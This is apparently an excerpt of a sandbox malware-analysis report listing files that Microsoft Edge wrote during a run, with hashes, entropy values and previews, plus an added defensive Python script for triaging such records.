SSDEEP:6:HU72hq1CHhJ23oH+Tcwtk2WwnvB2KLlVU78q2PCHhJ23oH+Tcwtk2WwnvIFUv:GEGYebkxwnvFLO8vBYebkxwnQFUv
MD5:F036A0DA578B7DBCB5A804CCF7DCEFBE
SHA1:6B0F03EE3037DC13D919A35ADE47051B7FF60177
SHA-256:176CD3E62098AD8262C06E31EAEBF0E1CFA562E4180975048D77E7C718AFD221
SHA-512:CA474E35FBADF19AB8C19096A852B7D53C63A0871EEB623B8B5C0264FA21889234DEB410FBD714583D6C96DC294C3670D35F16472A47902EFB7D033F19E405E7
Malicious:false
Preview:2024/11/18-10:53:43.835 10d0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/18-10:53:43.891 10d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):380
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:9FE07A071FDA31327FA322B32FCA0B7E
SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:false
Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):324
Entropy (8bit):5.216193072633667
Encrypted:false
SSDEEP:6:HUl3+q2PCHhJ23oH+Tcwt8aPrqIFUt8YUGZmw+YUCVkwOCHhJ23oH+Tcwt8amLJ:cOvBYebL3FUt8E/+k56YebQJ
MD5:89B8619C25DA5819E1C004C9927EA3B3
SHA1:5A77C5462E5AA4F76B3211174C60FC96BCE726E3
SHA-256:6726BDF84849B82D51E46C6CC818BD69BDD90A2BFA9D624954D8E3AA32B7BD20
SHA-512:62E981A0F1040A0EC3CC82417D5B233F70024E5C4AE5A9CFB3E15ACC2B347514D6EF93A51503FEDA259ED80D2E1AD1A0B2139BCFB84FB3006B0920EF38096B0B
Malicious:false
Preview:2024/11/18-10:53:35.328 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/18-10:53:35.329 1f28 Recovering log #3.2024/11/18-10:53:35.329 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):324
Entropy (8bit):5.216193072633667
Encrypted:false
SSDEEP:6:HUl3+q2PCHhJ23oH+Tcwt8aPrqIFUt8YUGZmw+YUCVkwOCHhJ23oH+Tcwt8amLJ:cOvBYebL3FUt8E/+k56YebQJ
MD5:89B8619C25DA5819E1C004C9927EA3B3
SHA1:5A77C5462E5AA4F76B3211174C60FC96BCE726E3
SHA-256:6726BDF84849B82D51E46C6CC818BD69BDD90A2BFA9D624954D8E3AA32B7BD20
SHA-512:62E981A0F1040A0EC3CC82417D5B233F70024E5C4AE5A9CFB3E15ACC2B347514D6EF93A51503FEDA259ED80D2E1AD1A0B2139BCFB84FB3006B0920EF38096B0B
Malicious:false
Preview:2024/11/18-10:53:35.328 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/18-10:53:35.329 1f28 Recovering log #3.2024/11/18-10:53:35.329 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):380
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:9FE07A071FDA31327FA322B32FCA0B7E
SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:false
Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):328
Entropy (8bit):5.2029675841205645
Encrypted:false
SSDEEP:6:HUv8t+q2PCHhJ23oH+Tcwt865IFUt8YUpp5Zmw+YUpptVkwOCHhJ23oH+Tcwt86L:4vBYeb/WFUt8Hp5/+HpT56Yeb/+SJ
MD5:7460835A50495C51686FB78E3C6E9768
SHA1:241A5316AAB7CEA1E79EEC34063DCE052B7A0692
SHA-256:EFD02ACAEA158B72DB2011B512ACD4AC9614C41446A0A3F6AFA8540E8FABA0E4
SHA-512:66CE77B41A7FE0BE879968025A13A673AFEE1D23EAAD2F151500B8751008661C119722400E0D32575DECA5FCB71DF4CD3250E45BF15140CD9537E24D45A4A6CA
Malicious:false
Preview:2024/11/18-10:53:35.338 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/18-10:53:35.351 1f28 Recovering log #3.2024/11/18-10:53:35.351 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):328
Entropy (8bit):5.2029675841205645
Encrypted:false
SSDEEP:6:HUv8t+q2PCHhJ23oH+Tcwt865IFUt8YUpp5Zmw+YUpptVkwOCHhJ23oH+Tcwt86L:4vBYeb/WFUt8Hp5/+HpT56Yeb/+SJ
MD5:7460835A50495C51686FB78E3C6E9768
SHA1:241A5316AAB7CEA1E79EEC34063DCE052B7A0692
SHA-256:EFD02ACAEA158B72DB2011B512ACD4AC9614C41446A0A3F6AFA8540E8FABA0E4
SHA-512:66CE77B41A7FE0BE879968025A13A673AFEE1D23EAAD2F151500B8751008661C119722400E0D32575DECA5FCB71DF4CD3250E45BF15140CD9537E24D45A4A6CA
Malicious:false
Preview:2024/11/18-10:53:35.338 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/18-10:53:35.351 1f28 Recovering log #3.2024/11/18-10:53:35.351 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1140
Entropy (8bit):1.8784775129881184
Encrypted:false
SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:914FD8DC5F9A741C6947E1AB12A9D113
SHA1:6529EFE14E7B0BEA47D78B147243096408CDAAE4
SHA-256:8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
                                                                                                                                                                                                                              SHA-512:2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):5.232988710139318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUz0TwVq2PCHhJ23oH+Tcwt8NIFUt8YUEWgZmw+YUEWIkwOCHhJ23oH+Tcwt8+ed:JIvBYebpFUt8WL/+WB56YebqJ
                                                                                                                                                                                                                              MD5:4937013990833A378B41B94987C08542
                                                                                                                                                                                                                              SHA1:E1DD81E610811D4ED2B3FB9B10FC817841D87465
                                                                                                                                                                                                                              SHA-256:1399A9D822C592BBA3A97DB2929A5983FA47DD11F51D839C502C2D8B880DE79A
                                                                                                                                                                                                                              SHA-512:D02476C7601359B9ECD4A2FEFE16F13743464C228C906990C55B1763BAE9ACE9AE5FB525551DE610CE0318946E90445C7C1DD29D911D898CAB5B4319022B74BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.479 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/18-10:53:36.480 f20 Recovering log #3.2024/11/18-10:53:36.480 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):5.232988710139318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUz0TwVq2PCHhJ23oH+Tcwt8NIFUt8YUEWgZmw+YUEWIkwOCHhJ23oH+Tcwt8+ed:JIvBYebpFUt8WL/+WB56YebqJ
                                                                                                                                                                                                                              MD5:4937013990833A378B41B94987C08542
                                                                                                                                                                                                                              SHA1:E1DD81E610811D4ED2B3FB9B10FC817841D87465
                                                                                                                                                                                                                              SHA-256:1399A9D822C592BBA3A97DB2929A5983FA47DD11F51D839C502C2D8B880DE79A
                                                                                                                                                                                                                              SHA-512:D02476C7601359B9ECD4A2FEFE16F13743464C228C906990C55B1763BAE9ACE9AE5FB525551DE610CE0318946E90445C7C1DD29D911D898CAB5B4319022B74BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.479 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/18-10:53:36.480 f20 Recovering log #3.2024/11/18-10:53:36.480 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZl0vFl:/M/xT02z1l
                                                                                                                                                                                                                              MD5:A497785746C23AD0402539976D737AFB
                                                                                                                                                                                                                              SHA1:8C4F7A3119F0A798E325DED6C6889505BD713D98
                                                                                                                                                                                                                              SHA-256:D7B02511EB368303960BBDF1609711BACBF10DD90DBB682AABB6494B54AC5B7B
                                                                                                                                                                                                                              SHA-512:BB10FED89D838493AB42D26A419A84302BFB2BEDB2E90F51B3745C815CE7C04D6F8638CEA41706A93C18CFE32384CF41116B3D541179D840202D0F3423EA2952
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):405
                                                                                                                                                                                                                              Entropy (8bit):5.303778307047709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:GJvBYeb8rcHEZrELFUt81PL/+1PB56Yeb8rcHEZrEZSJ:G1BYeb8nZrExg81PqPT6Yeb8nZrEZe
                                                                                                                                                                                                                              MD5:225F7EA583B48CA7F83AB2E6E30FEBE6
                                                                                                                                                                                                                              SHA1:848DBD42E56ED76E41CD92E080757596BCFADAEA
                                                                                                                                                                                                                              SHA-256:624D1FC49AA9E2C480A433E2336424163FA9CD951AD98643A3A73A3E6C6620E2
                                                                                                                                                                                                                              SHA-512:9943EDDA192C88433B6F7314015E7EE00D033D62581B659218016B663BF4869D6AB9C3379E5B9139076EC6CDC34BA4D485F1BBDD99101F33A7FC7BDD526BD966
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:40.753 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/18-10:53:40.754 f20 Recovering log #3.2024/11/18-10:53:40.754 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):405
                                                                                                                                                                                                                              Entropy (8bit):5.303778307047709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:GJvBYeb8rcHEZrELFUt81PL/+1PB56Yeb8rcHEZrEZSJ:G1BYeb8nZrExg81PqPT6Yeb8nZrEZe
                                                                                                                                                                                                                              MD5:225F7EA583B48CA7F83AB2E6E30FEBE6
                                                                                                                                                                                                                              SHA1:848DBD42E56ED76E41CD92E080757596BCFADAEA
                                                                                                                                                                                                                              SHA-256:624D1FC49AA9E2C480A433E2336424163FA9CD951AD98643A3A73A3E6C6620E2
                                                                                                                                                                                                                              SHA-512:9943EDDA192C88433B6F7314015E7EE00D033D62581B659218016B663BF4869D6AB9C3379E5B9139076EC6CDC34BA4D485F1BBDD99101F33A7FC7BDD526BD966
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:40.753 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/18-10:53:40.754 f20 Recovering log #3.2024/11/18-10:53:40.754 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):5.191680680739152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU1q2PCHhJ23oH+Tcwt8a2jMGIFUt8YUreZmw+YUrJzkwOCHhJ23oH+Tcwt8a2jz:IvBYeb8EFUt8Y/+z56Yeb8bJ
                                                                                                                                                                                                                              MD5:652ED586F72F70685AA7C93B7C498567
                                                                                                                                                                                                                              SHA1:00E7EF834E1CF7136F566B4A43B4EC081095ADBD
                                                                                                                                                                                                                              SHA-256:3D5D8F0F029341A0C7A7C6AF4B198B65C21C8C5CE73CE7DA71016A6E1C7F334D
                                                                                                                                                                                                                              SHA-512:763649E8C94FAC3CA8A47C4D3CC710BEB74760ADD7F35ECDBA55F424B12A0765BD1AECF5A25A187B48150C0A19B97A5B265CC9899BF10D24882D7A22D53A025C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.909 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:35.910 1994 Recovering log #3.2024/11/18-10:53:35.913 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):5.191680680739152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU1q2PCHhJ23oH+Tcwt8a2jMGIFUt8YUreZmw+YUrJzkwOCHhJ23oH+Tcwt8a2jz:IvBYeb8EFUt8Y/+z56Yeb8bJ
                                                                                                                                                                                                                              MD5:652ED586F72F70685AA7C93B7C498567
                                                                                                                                                                                                                              SHA1:00E7EF834E1CF7136F566B4A43B4EC081095ADBD
                                                                                                                                                                                                                              SHA-256:3D5D8F0F029341A0C7A7C6AF4B198B65C21C8C5CE73CE7DA71016A6E1C7F334D
                                                                                                                                                                                                                              SHA-512:763649E8C94FAC3CA8A47C4D3CC710BEB74760ADD7F35ECDBA55F424B12A0765BD1AECF5A25A187B48150C0A19B97A5B265CC9899BF10D24882D7A22D53A025C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.909 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:35.910 1994 Recovering log #3.2024/11/18-10:53:35.913 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
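Every record in this stretch is Edge profile housekeeping written by msedge.exe: LevelDB LOG files whose preview reads "Reusing MANIFEST ... Recovering log ... Reusing old log", plus one near-empty preallocated database file, all marked Malicious:false. When a report carries hundreds of such entries, the practical first step is to parse the Key:Value layout and drop the browser noise so the real droppers stand out. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses this layout, recomputes the "Entropy (8bit)" figure (Shannon entropy in bits per byte) so a value on the page can be checked against a file recovered from the sandbox, and sorts records into noise, review and flagged. The record text is constructed from two entries above with abridged previews; the entropy thresholds, class names and the regex for LevelDB log lines are assumptions of the example.

```python
import math
import re
from typing import Dict, List

# Constructed input: two records in the report's own "Key:Value" layout, with
# values copied from the 321-byte LevelDB LOG entry and the 270336-byte
# "modified" entry above. Previews are abridged to their first line.
SAMPLE_RECORDS = r"""
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):321
Entropy (8bit):5.232988710139318
Encrypted:false
MD5:4937013990833A378B41B94987C08542
SHA-256:1399A9D822C592BBA3A97DB2929A5983FA47DD11F51D839C502C2D8B880DE79A
Malicious:false
Preview:2024/11/18-10:53:36.479 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):270336
Entropy (8bit):0.0018164538716206491
Encrypted:false
MD5:A497785746C23AD0402539976D737AFB
SHA-256:D7B02511EB368303960BBDF1609711BACBF10DD90DBB682AABB6494B54AC5B7B
Malicious:false
Preview:................
"""


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the flat Key:Value listing into one dict per dropped file.
    Every 'Process:' line opens a new record; lines before the first one
    (the tail of a record cut off by pagination) are skipped."""
    records: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)  # split once: values contain "C:\"
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the quantity the report
    labels 'Entropy (8bit)'. All-zero data scores 0.0, uniform bytes 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


# Assumed pattern for the first line of a LevelDB LOG file (timestamp,
# thread id in hex, then one of LevelDB's recovery messages).
LEVELDB_LOG_LINE = re.compile(
    r"^\d{4}/\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d{3} [0-9a-f]+ "
    r"(Reusing MANIFEST|Recovering log|Reusing old log|Delete type)"
)
BROWSER_BINARIES = ("msedge.exe", "chrome.exe", "firefox.exe")

# Thresholds are illustrative assumptions, not values taken from Joe Sandbox.
NOISE_ENTROPY_MAX = 0.1   # preallocated, nearly all-zero cache/db files
PACKED_ENTROPY_MIN = 7.2  # compressed or encrypted payload candidates


def triage(record: Dict[str, str]) -> str:
    """Classify one record: 'flagged' (needs a look), 'noise' (routine
    browser profile churn) or 'review' (everything else)."""
    if record.get("Malicious", "").strip().lower() == "true":
        return "flagged"
    proc = record.get("Process", "").strip().lower()
    preview = record.get("Preview", "")
    try:
        entropy = float(record.get("Entropy (8bit)", ""))
    except ValueError:
        entropy = float("nan")  # NaN fails both comparisons below -> 'review'
    from_browser = proc.endswith(BROWSER_BINARIES)
    if from_browser and LEVELDB_LOG_LINE.match(preview):
        return "noise"
    if from_browser and entropy < NOISE_ENTROPY_MAX:
        return "noise"
    if entropy > PACKED_ENTROPY_MIN and record.get("Category") == "dropped":
        return "flagged"
    return "review"


def summarize(text: str) -> Dict[str, int]:
    """Count records per triage class; the headline number a reviewer wants
    is how many entries remain once the browser noise is removed."""
    counts: Dict[str, int] = {"flagged": 0, "noise": 0, "review": 0}
    for rec in parse_records(text):
        counts[triage(rec)] += 1
    return counts


if __name__ == "__main__":
    print(summarize(SAMPLE_RECORDS))
    print(round(shannon_entropy_8bit(b"\x00" * 270336), 6))
```

To check a page value, recompute `shannon_entropy_8bit()` over the file pulled from the sandbox and compare it with the record's "Entropy (8bit)" field; a mismatch means the artifact on disk is not the one the report hashed. The "flagged" rule deliberately ignores files written by browser processes, so a high-entropy cache entry does not compete with a packed dropper for attention.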

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Preview:{"SDCH":{"dictionaries":{},"version":2}}

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):20480
Entropy (8bit):1.3556582877509145
Encrypted:false
SSDEEP:48:TsKLopF+SawLUO1Xj8BK0W7n9FYlfpGD+eem/rjo8zqYgVMFX08:te+AuK0W7n9IfpGqlEfhzqYcUX08
MD5:557529561F2A709DB18A2A3E65A13815
SHA1:B06EF2B97A9AC817D663D22233C2485D359F5210
SHA-256:7CE5583FA83E162EB0881ADDDA76130E2DB3498BD9D8EDBC4292D80916A7608A
SHA-512:AEFEC85F0B631181BF14791616144AEAE4E22C16C239AD9A73E725A0979E6C8C026AB9935D3A395528E514E2862D23F9CC9C359FB62AAB8400C5235E524C1A4A
Malicious:true
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1334
Entropy (8bit):5.3068589626259115
Encrypted:false
SSDEEP:24:YcCp/WwFGJ/I3w6C1VdsfgZVMdmRds/pJZFRudFGRwC5mWw6maPsQYhbS7nby:YcCpfgCgRsfgts/p/fc7C0khYhbt
MD5:49A69CA3DB588A227043FAD82A8EED0F
SHA1:EB7B013107043573C381D8E501A44359A235AA6A
SHA-256:801C37DA262918F4D4905DD59A3DD0E39F28D1B9415FA98B49C8F74BC9B7098E
SHA-512:F30BF2452A9200E4C6D18A5445B48CD217CF45A503CB404DB21E2947DBE7DD747F5593588102CCEC17679B93E8130B728C006C2BA986222425A52D896C5A0542
Malicious:false
                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010818082117","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010821830801","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczo

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:dropped
Size (bytes):36864
Entropy (8bit):1.2776510377807921
Encrypted:false
SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBG2z:uIEumQv8m1ccnvS6GYmdMkiiQEz1a
MD5:FDEBCB687C70B16280EF4CC0C5ECBF17
SHA1:C5EA6CFE7D270DA9418694505F21BFFB0E608035
SHA-256:470DA529FF81D62E1F4FCC00060F7C55A130C1D343AE116401B5CE1F5E8066FD
SHA-512:C36C7BC4F4615D4FB0E9E4D0B36B96D7F5B3DB4AEC6CA4F6DA7B69F33230EF05824D0C4C21435B4EB0E325BD373D7DCE824C82E21DCEFB82DBDC6E6DB6BEBA87
Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
